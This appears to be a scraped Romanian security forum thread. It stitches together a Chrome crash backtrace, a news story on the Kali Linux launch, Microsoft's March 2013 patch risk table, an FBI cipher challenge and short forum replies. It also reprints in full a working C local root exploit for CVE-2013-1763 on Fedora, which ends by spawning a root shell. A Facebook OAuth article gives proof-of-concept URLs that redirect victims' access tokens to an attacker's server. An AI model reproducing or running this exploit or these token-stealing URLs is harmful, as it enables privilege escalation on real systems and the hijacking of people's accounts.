0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 13 (Thread 0xace5fb70 (LWP 10486)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f36b86 in poll () from /lib/tls/i686/cmov/libc.so.6 #2 0xb2a96718 in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #3 0xb2a948a3 in __libc_res_nquery () from /lib/tls/i686/cmov/libresolv.so.2 #4 0xb2a94e8b in ?? () from /lib/tls/i686/cmov/libresolv.so.2 #5 0xb2a95119 in __libc_res_nsearch () from /lib/tls/i686/cmov/libresolv.so.2 #6 0xabc80bd6 in _nss_dns_gethostbyname3_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #7 0xabc80f2b in _nss_dns_gethostbyname2_r () from /lib/tls/i686/cmov/libnss_dns.so.2 #8 0xb2f5bb0d in gethostbyname2_r () from /lib/tls/i686/cmov/libc.so.6 #9 0xb2f1d010 in ?? () from /lib/tls/i686/cmov/libc.so.6 #10 0xb2f1ea65 in getaddrinfo () from /lib/tls/i686/cmov/libc.so.6 #11 0xb4a33e2a in net::SystemHostResolverProc(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #12 0xb4a23537 in net::(anonymous namespace)::CallSystemHostResolverProc::Resolve(std::string const&, net::AddressFamily, int, net::AddressList*, int*) () #13 0xb4a239a3 in net::HostResolverImpl::ProcTask::DoLookup(base::TimeTicks const&, unsigned int) () #14 0xb4a229b5 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (net::HostResolverImpl::ProcTask:)(base::TimeTicks const&, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int), void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks, unsigned int)>, void ()(net::HostResolverImpl::ProcTask*, base::TimeTicks const&, unsigned int)>::Run(base::internal::BindStateBase*) () #15 0xb49c2701 in base::(anonymous namespace)::WorkerThread::ThreadMain() () #16 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #17 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #18 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 12 (Thread 0xad660b70 (LWP 10485)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f40d37 in syscall () from /lib/tls/i686/cmov/libc.so.6 #2 0xb49e6410 in epoll_wait () #3 0xb49e5e75 in epoll_dispatch () #4 0xb49e42a7 in event_base_loop () #5 0xb495eda7 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb652797d in content::BrowserThreadImpl::IOThreadRun(MessageLoop*) () #11 0xb6529da3 in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 11 (Thread 0xade61b70 (LWP 10484)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f40d37 in syscall () from /lib/tls/i686/cmov/libc.so.6 #2 0xb49e6410 in epoll_wait () #3 0xb49e5e75 in epoll_dispatch () #4 0xb49e42a7 in event_base_loop () #5 0xb495eda7 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527a1d in content::BrowserThreadImpl::CacheThreadRun(MessageLoop*) () #11 0xb6529db1 in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 10 (Thread 0xae662b70 (LWP 10483)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527abd in content::BrowserThreadImpl::ProcessLauncherThreadRun(MessageLoop*) () #11 0xb6529dbf in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 9 (Thread 0xaee63b70 (LWP 10482)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527b5d in content::BrowserThreadImpl::FileUserBlockingThreadRun(MessageLoop*) () #11 0xb6529dce in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 8 (Thread 0xaf664b70 (LWP 10481)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f40d37 in syscall () from /lib/tls/i686/cmov/libc.so.6 #2 0xb49e6410 in epoll_wait () #3 0xb49e5e75 in epoll_dispatch () #4 0xb49e42a7 in event_base_loop () #5 0xb495eda7 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527bfd in content::BrowserThreadImpl::FileThreadRun(MessageLoop*) () #11 0xb6529dde in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 7 (Thread 0xafe65b70 (LWP 10480)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527c9d in content::BrowserThreadImpl::WebKitThreadRun(MessageLoop*) () #11 0xb6529dee in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 6 (Thread 0xb0666b70 (LWP 10479)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb6527d3d in content::BrowserThreadImpl::DBThreadRun(MessageLoop*) () #11 0xb6529dfe in content::BrowserThreadImpl::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 5 (Thread 0xb280db70 (LWP 10478)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3367f5b in read () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb4254037 in (anonymous namespace)::ShutdownDetector::ThreadMain() () #3 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #4 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #5 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 4 (Thread 0xb1733b70 (LWP 10477)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb3365015 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/tls/i686/cmov/libpthread.so.0 #2 0xb49b1d48 in base::ConditionVariable::Wait() () #3 0xb49b36f0 in base::WaitableEvent::TimedWait(base::TimeDelta const&) () #4 0xb49b3736 in base::WaitableEvent::Wait() () #5 0xb498e0c4 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb49bfa91 in base::Thread::ThreadMain() () #11 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #12 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #13 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 3 (Thread 0xb1f34b70 (LWP 10476)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f3d971 in select () from /lib/tls/i686/cmov/libc.so.6 #2 0xb497f952 in base::files::(anonymous namespace)::InotifyReaderCallback(base::files::(anonymous namespace)::InotifyReader*, int, int) () #3 0xb497cc19 in base::internal::Invoker<3, base::internal::BindState<base::internal::RunnableAdapter<void (base::files::(anonymous namespace)::InotifyReader*, int, int)>, void ()(base::files::(anonymous namespace)::InotifyReader*, int, int), void ()(base::files::(anonymous namespace)::InotifyReader*, int, int)>, void ()(base::files::(anonymous namespace)::InotifyReader*, int, int)>::Run(base::internal::BindStateBase*) () #4 0xb498c220 in MessageLoop::RunTask(base::PendingTask const&) () #5 0xb498c8c2 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) () #6 0xb498cc31 in MessageLoop::DoWork() () #7 0xb498e06b in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) () #8 0xb498846e in MessageLoop::RunInternal() () #9 0xb49a4ae9 in base::RunLoop::Run() () #10 0xb498775e in MessageLoop::Run() () #11 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #12 0xb49bfa91 in base::Thread::ThreadMain() () #13 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #14 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #15 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 2 (Thread 0xb2735b70 (LWP 10475)): #0 0xb3d80430 in __kernel_vsyscall () #1 0xb2f40d37 in syscall () from /lib/tls/i686/cmov/libc.so.6 #2 0xb49e6410 in epoll_wait () #3 0xb49e5e75 in epoll_dispatch () #4 0xb49e42a7 in event_base_loop () #5 0xb495eda7 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) () #6 0xb498846e in MessageLoop::RunInternal() () #7 0xb49a4ae9 in base::RunLoop::Run() () #8 0xb498775e in MessageLoop::Run() () #9 0xb49bfbb9 in base::Thread::Run(MessageLoop*) () #10 0xb49bfa91 in base::Thread::ThreadMain() () #11 0xb49bb148 in base::(anonymous namespace)::ThreadFunc(void*) () #12 0xb336096e in start_thread () from /lib/tls/i686/cmov/libpthread.so.0 #13 0xb2f44a4e in clone () from /lib/tls/i686/cmov/libc.so.6 Thread 1 (Thread 0xb2977990 (LWP 10468)): #0 0xb40ea92b in (anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int) () #1 0xb40caf9b in base::internal::Invoker<4, base::internal::BindState<base::internal::RunnableAdapter<void (ChromeURLDataManager::DataSource:)(std::string const&, bool, int)>, void ()(ChromeURLDataManager::DataSource*, std::string const&, bool, int), void ()(ChromeURLDataManager::DataSource*, std::string, bool, int)>, void ()(ChromeURLDataManager::DataSource*, std::string const&, bool, int)>::Run(base::internal::BindStateBase*) () #2 0xb498c220 in MessageLoop::RunTask(base::PendingTask const&) () #3 0xb498c8c2 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) () #4 0xb498cc31 in MessageLoop::DoWork() () #5 0xb49d58be in base::MessagePumpGlib::RunWithDispatcher(base::MessagePump::Delegate*, base::MessagePumpDispatcher*) () #6 0xb49d543c in base::MessagePumpGlib::Run(base::MessagePump::Delegate*) () #7 0xb498846e in MessageLoop::RunInternal() () #8 0xb49a4ae9 in base::RunLoop::Run() () #9 0xb46513f5 in ChromeBrowserMainParts::MainMessageLoopRun(int*) () #10 0xb65262ec in content::BrowserMainLoop::RunMainMessageLoopParts() () #11 0xb6527280 in (anonymous namespace)::BrowserMainRunnerImpl::Run() () #12 0xb65247f3 in BrowserMain(content::MainFunctionParams const&) () #13 0xb48fb758 in content::RunNamedProcessTypeMain(std::string const&, content::MainFunctionParams const&, content::ContentMainDelegate*) () #14 0xb48fb8b0 in content::ContentMainRunnerImpl::Run() () #15 0xb48fa797 in content::ContentMain(int, char const**, content::ContentMainDelegate*) () #16 0xb3fbe60b in ChromeMain () #17 0xb3fbe5c2 in main () eax 0x4 4 ecx 0xb81187c0 -1206810688 edx 0x0 0 ebx 0xb8158ff4 -1206546444 esp 0xbfffdfa0 0xbfffdfa0 ebp 0xbfffe588 0xbfffe588 esi 0xbfffe4b0 -1073748816 edi 0xb8829880 -1199400832 eip 0xb40ea92b 0xb40ea92b <(anonymous namespace)::InspectDataSource::StartDataRequest(std::string const&, bool, int)+1899> eflags 0x210286 [ PF SF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 => 0xb40ea92b <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1899>: mov (%edx),%eax 0xb40ea92d <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1901>: mov %edx,(%esp) 0xb40ea930 <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1904>: call *0x28(%eax) 0xb40ea933 <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1907>: mov %eax,-0x580(%ebp) edx 0x0 0 eax 0x4 4 1: x/i $pc => 0xb40ea92b <_ZN12_GLOBAL__N_117InspectDataSource16StartDataRequestERKSsbi+1899>: mov (%edx),%eax Sursa: Google Chrome 21.0.1180.57 NULL Pointer ? Packet Storm

Fedora Linux SOCK_DIAG Local Root Authored by Thiebaud Weksteen Local root exploit for Fedora 18 x86_64 using nl_table to leverage the sock_diag_handlers[] vulnerability. /* * CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 * This exploit uses nl_table to jump to a known location */ #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy, sym[512]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (!f) { return 0; } while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); if (ret == 0) { fscanf(f, "%s\n", sym); continue; } if (!strcmp(name, sym)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char*argv[]) { int fd; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; commit_creds = (_commit_creds) get_symbol("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); sock_diag_handlers = get_symbol("sock_diag_handlers"); nl_table = get_symbol("nl_table"); if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ printf("some symbols are not available!\n"); exit(1); } family = (nl_table - sock_diag_handlers) / 8; printf("family=%d\n",family); req.r.sdiag_family = family; if(family>255){ printf("nl_table is too far!\n"); exit(1); } unsigned long mmap_start, mmap_size; mmap_start = 0x100000000; mmap_size = 0x200000; printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55" // push %ebp "\x48\x89\xe5" // mov %rsp, %rbp "\x48\xc7\xc0\x00\x00\x00\x00" // movabs 0x00, %rax "\xff\xd0" // call *%rax "\x5d" // pop %rbp "\xc3"; // ret unsigned int *asd = (unsigned int*) &jump[7]; *asd = (unsigned int)kernel_code; printf("&kernel_code = %x\n", (unsigned int) kernel_code); memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid()) system("/bin/sh"); } Sursa: Fedora Linux SOCK_DIAG Local Root ? Packet Storm

Ce e de ShowOff, ca ai intrat pe un link si ai pus o ghilimea? Trashed!

Unhook la SSDT? Si la Kaspersky merge?

Da, RSSOwl am si eu si e bine pus la punct. PS: Pentru unele feed-uri mereu gaseste unele vechi ca fiind noi. Dar e ok in rest.

1. Doar BitDefender? 2. Proactive Defence (sau cum se cheama la Bit) era pornita? 3. Are driver? Ruleaza kernel-mode?

[h=1]BackTrack successor Kali Linux launched[/h]By Darren Pauli on Mar 13, 2013 10:04 PM A computer small enough to fit inside the palm of a hand sits in the corner of an office, its lights blinking. It looks like a toy to most, but the small ARM-based machine is running the latest version of Backtrack, and is breaking into the corporate network. Such a feat was not possible prior to this evening's release of Kali, the sixth installment of the uber-powerful and super-secure penetration testing platform. BackTrack obtained support for ARM-based devices as part of its quiet year-long and ground-up overhaul by the small group of security professionals who designed the operating system, now considered essential kit for penetration tests. The authors hailing from Offensive Security together with security professionals at Rapid7, who offered free assistance in the rebuild, announced Kali at BlackHat Europe. Outwardly, Kali looks the same as the previous version of BackTrack. But dig a little deeper, according to founder Mati Aharoni, and that's where the similarities end. "It boots like BackTrack, but when you look deeper into Kali, you see all these amazing new features that just weren't available in BackTrack," Aharoni told SC speaking ahead of the launch in Amsterdam. "Everything has changed." Kali has become sleeker and more secure: All packages were subject to a vetting process and were signed by developers with GPG keys. This Aharoni said introduced complete visibility into the development chain. "There is a very clear public development of each package so you can see changes easily. Visibility increased ten-fold." The Metasploit Framework too has been rebuilt. Rapid7, keen to remove the rough-around-the-edges integration of the popular exploit arsenal within BackTrack, contacted Offensive Security. In a streak of luck, the call came in early in Kali's development. From there, Metasploit underwent a considerable overhaul to become one of the most complex packages in Kali. "Users will be in for a much smoother ride," Aharoni said. "It was never built to be packaged as a distribution so we needed to massage it" This took the form of a Debian repo rather than an at times messy binary installer, Rapid7 product manager Christian Kirsch said. "A tonne of our users were using Metasploit on BackTrack," Kirsch said. "Now if you update Kali, you update Metasploit." "It is critical to take the view of the attacker to see if your defences are working. The smartest people in the world may make mistakes in setting up defences." It is also features a more friendly user interface and was available in the paid professional edition. A razor has been applied to BackTrack's pre-packaged pen testing tools, eradicating 50 unpopular tools and introducing more powerful offerings into Kali. iKat, a hacking tool to audit the security of browser controlled enviroments like Kiosks, Citrix Terminals and WebTVs, was one such addition. The developers went to lengths to get the tool on board and had even helped the author further develop and integrate it into Kali. Kali comes as fully customisable. Users were able to pick and choose the tools they want in the platform, including private applications, prior to downloading the ISO, even down to their choice of wallpaper. This Aharoni said makes Kali open to low-end systems and ARM based devices. Pre-built packages exist for a host of ARM devices including Raspberry Pi and ODROID. Kali is now available for download and the wiki page is also online. Sursa: BackTrack successor Kali Linux launched - Applications - SC Magazine Australia - Secure Business Intelligence

[h=3]Facebook hacking accounts using another OAuth vulnerability[/h]Posted by: Mohit Kumar onTuesday, March 12, 2013 Remember the last OAuth Flaw in Facebook, that allow an attacker to hijack any account without victim's interaction with any Facebook Application, was reported by white hat Hacker 'Nir Goldshlager'. After that Facebook security team fixed that issue using some minor changes. Yesterday Goldshlager once again pwn Facebook OAuth mechanism by bypassing all those minor changes done by Facebook Team. He explains the complete Saga of hunting Facebook bug in a blog post. As explained in last report on The hacker News, OAuth URL contains two parameters i.e. redirect_uri &next, and using Regex Protection (%23xxx!,%23/xxx,/) Facebook team tried to secure that after last patch. In recent discovered technique hacker found that next parameter allow facebook.facebook.com domain as a valid option and multiple hash signs is now enough to bypass Regex Protection. He use facebook.com/l.php file (used by Facebook to redirect users to external links) to redirect victims to his malicious Facebook application and then to his own server for storing token values, where tokens are the alternate access to any Facebook account without password. But a warning message while redirecting ruin the show ! No worries, he found that 5 bytes of data in redirection URL is able to bypass this warning message. Example: https://www.facebook.com/l/goldy;touch.facebook.com/apps/sdfsdsdsgs (where 'goldy' is the 5 byte of data used). Now at the last step, He Redirect the victim to external websites located in files.nirgoldshlager.com (attacker server) via malicious Facebook app created by him and victim's access_token will be logged there. So here we have the final POC that can hack any Facebook account by exploiting another Facebook OAuth bug. For all browsers: https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https://facebook.facebook.com/%23/x/%23/l/ggggg%3btouch.facebook.com/apps/sdfsdsdsgs%23&display=page&fbconnect=1&method=permissions.request&response_type=token For Firefox browser: https://www.facebook.com/dialog/permissions.request?app_id=220764691281998&display=page&next=https%3A%2F%2Ftouch.facebook.com%2F%2523%2521%2Fapps%2Ftestestestte%2F&response_type=token&perms=email&fbconnect=1 This bug was also reported to Facebook Security Team last week by Nir Goldshlager and patched now, if you are a hacker, we expect YOU to hack it again ! Sursa: Facebook hacking accounts using another OAuth vulnerability - Hacking News

Ba da, dar nu am pus link-ul acela. Poate sunt persoane care vor sa incerce.

[h=3]Assessing risk for the March 2013 security updates[/h]swiat 12 Mar 2013 10:07 AM Today we released seven security bulletins addressing 20 CVE’s. Four of the bulletins have a maximum severity rating of Critical, and three have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment. [TABLE] [TR] [TD]Bulletin[/TD] [TD]Most likely attack vector[/TD] [TD]Max Bulletin Severity[/TD] [TD]Max Exploit-ability Index[/TD] [TD]Likely first 30 days impact[/TD] [TD]Platform mitigations and key notes[/TD] [/TR] [TR] [TD]MS13-021 (Internet Explorer) [/TD] [TD]Victim browses to a malicious webpage.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Exploit code for CVE-2013-1288, an issue affecting IE8, is publicly available. Likely to see reliable exploits developed within next 30 days for other vulnerabilities addressed by this update as well.[/TD] [TD]IE 10 on Windows 7 is not affected.[/TD] [/TR] [TR] [TD]MS13-022 (Silverlight) [/TD] [TD]Victim browses to a malicious webpage.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Affects Silverlight 5.[/TD] [/TR] [TR] [TD]MS13-027 (Windows USB driver) [/TD] [TD]Attacker physically inserts malicious USB device into victim’s workstation or server, resulting in code execution at SYSTEM.[/TD] [TD]Important[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Pre-auth code execution only possible for attacker able to physically insert malicious hardware device into victim computer. See this blog post for more background on this vulnerability.[/TD] [/TR] [TR] [TD]MS13-024 (SharePoint 2010) [/TD] [TD]Attacker issues a search query on the SharePoint site with malicious script in the query string. In certain circumstances, a SharePoint admin may view search queries in such a way that the script from the attacker’s search query is run in the context of the SharePoint administrator’s session.[/TD] [TD]Critical[/TD] [TD]1[/TD] [TD]Likely to see reliable exploits developed within next 30 days.[/TD] [TD]Affects only SharePoint Server 2010 Service Pack 1, no earlier or later versions of SharePoint.[/TD] [/TR] [TR] [TD]MS13-023 (Visio Viewer 2010) [/TD] [TD]Victim uses Visio Viewer 2010 to opens malicious Visio .DXF file.[/TD] [TD]Critical[/TD] [TD]2[/TD] [TD]Less likely to see reliable exploit developed for this vulnerability. Visio Viewer exploits not often seen in the wild and this one looks more difficult than usual to exploit for reliable code execution.[/TD] [TD]Visio itself not affected by this vulnerability directly. Only Visio Viewer 2010 affected.[/TD] [/TR] [TR] [TD]MS13-025 (OneNote 2010) [/TD] [TD]Attacker lures victim to open OneNote file from a malicious or attacker-controlled directory. Attacker uses this vulnerability to cause process memory from the victim’s OneNote process to be written back to the file in the attacker’s directory, potentially leaking information to the attacker.[/TD] [TD]Important[/TD] [TD]n/a[/TD] [TD]Not possible to leverage this vulnerability for code execution directly. Information disclosure only.[/TD] [TD]Affects only OneNote 2010 Service Pack 1, no earlier or later versions of OneNote. Attacker must lure victim to opening file from a server or location they control. Only information in the OneNote process at the time of user opening the malicious file could become accessible to the attacker.[/TD] [/TR] [TR] [TD]MS13-026 (Office Outlook for Mac) [/TD] [TD]Attacker sends victim an email with links to external content. Content is loaded without prompting user.[/TD] [TD]Important[/TD] [TD]n/a[/TD] [TD]Not possible to leverage this vulnerability for code execution directly. Information disclosure only.[/TD] [TD] [/TD] [/TR] [/TABLE] - Jonathan Ness, MSRC Engineering Sursa: Assessing risk for the March 2013 security updates - Security Research & Defense - Site Home - TechNet Blogs

Can You Crack a Code? Cica e problema data la cursul meu de cryptografie de la facultate. 12/24/09 We've challenged you before—in November 2007, December 2008, and May 2009—to unravel a code and reveal its secret message like the “cryptanalysts” in our FBI Laboratory. In our latest quiz, we've switched gears a bit, using pictogram symbols based on Native American motifs. And with more than 50 words to decipher, it's our longest one so far. For the first time, we're also posting the answer (see the bottom of this page) in case you are stumped. We ask, however, that you not post the solution on the web so that everyone can have a chance to give it a try. Once again: If you want a primer on basic cipher systems and how to break them, see the article "." Good luck! Note: Sorry, but cracking this code doesn't guarantee you a job with the FBI! But do check out careers with us at FBIJobs.gov. Sursa: FBI — Cryptanalysis Challenge 2009

Bun, VIP.

